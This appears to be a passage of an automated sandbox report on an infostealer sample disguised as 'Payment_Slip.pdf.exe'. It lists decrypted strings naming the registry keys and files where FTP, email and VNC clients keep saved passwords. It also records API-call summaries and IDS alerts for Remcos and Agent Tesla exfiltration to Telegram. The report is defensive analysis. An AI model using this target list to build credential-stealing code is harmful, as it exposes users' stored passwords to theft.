Source: 12.0.host.exe.240000.0.unpack String decryptor: <Pass encoding="base64">
Source: 12.0.host.exe.240000.0.unpack String decryptor: </Pass>
Source: 12.0.host.exe.240000.0.unpack String decryptor: CoreFTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 12.0.host.exe.240000.0.unpack String decryptor: User
Source: 12.0.host.exe.240000.0.unpack String decryptor: Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: Port
Source: 12.0.host.exe.240000.0.unpack String decryptor: hdfzpysvpzimorhk
Source: 12.0.host.exe.240000.0.unpack String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 12.0.host.exe.240000.0.unpack String decryptor: HostName
Source: 12.0.host.exe.240000.0.unpack String decryptor: UserName
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: PublicKeyFile
Source: 12.0.host.exe.240000.0.unpack String decryptor: PortNumber
Source: 12.0.host.exe.240000.0.unpack String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 12.0.host.exe.240000.0.unpack String decryptor: WinSCP
Source: 12.0.host.exe.240000.0.unpack String decryptor: ABCDEF
Source: 12.0.host.exe.240000.0.unpack String decryptor: Flash FXP
Source: 12.0.host.exe.240000.0.unpack String decryptor: port
Source: 12.0.host.exe.240000.0.unpack String decryptor: user
Source: 12.0.host.exe.240000.0.unpack String decryptor: pass
Source: 12.0.host.exe.240000.0.unpack String decryptor: quick.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: Sites.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FlashFXP\
Source: 12.0.host.exe.240000.0.unpack String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTP Navigator
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FTP Navigator\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: No Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: User
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmartFTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: APPDATA
Source: 12.0.host.exe.240000.0.unpack String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 12.0.host.exe.240000.0.unpack String decryptor: WS_FTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: HOST
Source: 12.0.host.exe.240000.0.unpack String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack String decryptor: PWD=
Source: 12.0.host.exe.240000.0.unpack String decryptor: FtpCommander
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: SystemDrive
Source: 12.0.host.exe.240000.0.unpack String decryptor: \cftp\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Server=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Port=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Password=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;User=
Source: 12.0.host.exe.240000.0.unpack String decryptor: ;Anonymous=
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack String decryptor: \FTPGetter\servers.xml
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_ip>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_port>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_user_name>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: <server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: </server_user_password>
Source: 12.0.host.exe.240000.0.unpack String decryptor: FTPGetter
Source: 12.0.host.exe.240000.0.unpack String decryptor: The Bat!
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: \The Bat!
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.CFN
Source: 12.0.host.exe.240000.0.unpack String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 12.0.host.exe.240000.0.unpack String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 12.0.host.exe.240000.0.unpack String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 12.0.host.exe.240000.0.unpack String decryptor: DataDir
Source: 12.0.host.exe.240000.0.unpack String decryptor: Folder.lst
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Mailbox.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: PassWd
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Becky!
Source: 12.0.host.exe.240000.0.unpack String decryptor: Outlook
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: IMAP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3 Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: HTTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Windows Mail App
Source: 12.0.host.exe.240000.0.unpack String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: SchemaId
Source: 12.0.host.exe.240000.0.unpack String decryptor: pResourceElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pIdentityElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: pPackageSid
Source: 12.0.host.exe.240000.0.unpack String decryptor: pAuthenticatorElement
Source: 12.0.host.exe.240000.0.unpack String decryptor: syncpassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: mailoutgoing
Source: 12.0.host.exe.240000.0.unpack String decryptor: FoxMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 12.0.host.exe.240000.0.unpack String decryptor: Executable
Source: 12.0.host.exe.240000.0.unpack String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 12.0.host.exe.240000.0.unpack String decryptor: FoxmailPath
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Storage\
Source: 12.0.host.exe.240000.0.unpack String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Accounts\Account.rec0
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Account.stg
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPHost
Source: 12.0.host.exe.240000.0.unpack String decryptor: IncomingServer
Source: 12.0.host.exe.240000.0.unpack String decryptor: Account
Source: 12.0.host.exe.240000.0.unpack String decryptor: MailAddress
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: POP3Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: Opera Mail
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: opera:
Source: 12.0.host.exe.240000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
Source: 12.0.host.exe.240000.0.unpack String decryptor: PocoMail
Source: 12.0.host.exe.240000.0.unpack String decryptor: appdata
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Pocomail\accounts.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: POPPass
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTPPass
Source: 12.0.host.exe.240000.0.unpack String decryptor: SMTP
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client\accounts.dat
Source: 12.0.host.exe.240000.0.unpack String decryptor: eM Client
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: "Username":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: "Secret":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 12.0.host.exe.240000.0.unpack String decryptor: "ProviderName":"
Source: 12.0.host.exe.240000.0.unpack String decryptor: o6806642kbM7c5
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack String decryptor: SenderIdentities
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: \Mailbird\Store\Store.db
Source: 12.0.host.exe.240000.0.unpack String decryptor: Server_Host
Source: 12.0.host.exe.240000.0.unpack String decryptor: Accounts
Source: 12.0.host.exe.240000.0.unpack String decryptor: Email
Source: 12.0.host.exe.240000.0.unpack String decryptor: Username
Source: 12.0.host.exe.240000.0.unpack String decryptor: EncryptedPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Mailbird
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\RealVNC\vncserver
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 4.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: RealVNC 3.x
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\ORL\WinVNC3
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: PasswordViewOnly
Source: 12.0.host.exe.240000.0.unpack String decryptor: TightVNC ControlPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TightVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: ControlPassword
Source: 12.0.host.exe.240000.0.unpack String decryptor: TigerVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: Software\TigerVNC\Server
Source: 12.0.host.exe.240000.0.unpack String decryptor: Password
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd
Source: 12.0.host.exe.240000.0.unpack String decryptor: UltraVNC
Source: 12.0.host.exe.240000.0.unpack String decryptor: ProgramFiles(x86)
Source: 12.0.host.exe.240000.0.unpack String decryptor: \UltraVNC\ultravnc.ini
Source: 12.0.host.exe.240000.0.unpack String decryptor: passwd2
Source: 12.0.host.exe.240000.0.unpack String decryptor: JDownloader 2.0
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 11_2_004315EC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 14_2_00404423
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 17_2_004315EC
Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_0cda5b99-4
Uses 32bit PE files
Source: Payment_Slip.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: Payment_Slip.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004068CD FindFirstFileW,FindNextFileW, 11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0044BA59 FindFirstFileExA, 11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004068CD FindFirstFileW,FindNextFileW, 17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0044BA59 FindFirstFileExA, 17_2_0044BA59
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040AC78
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_00406D28
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 4x nop then jmp 09617E79h 0_2_0961865C
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 4x nop then jmp 076D7009h 7_2_076D77EC

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49720 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49724 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49722 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49725 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49721 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49723 -> 103.186.117.228:9373
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49759 -> 149.154.167.220:443
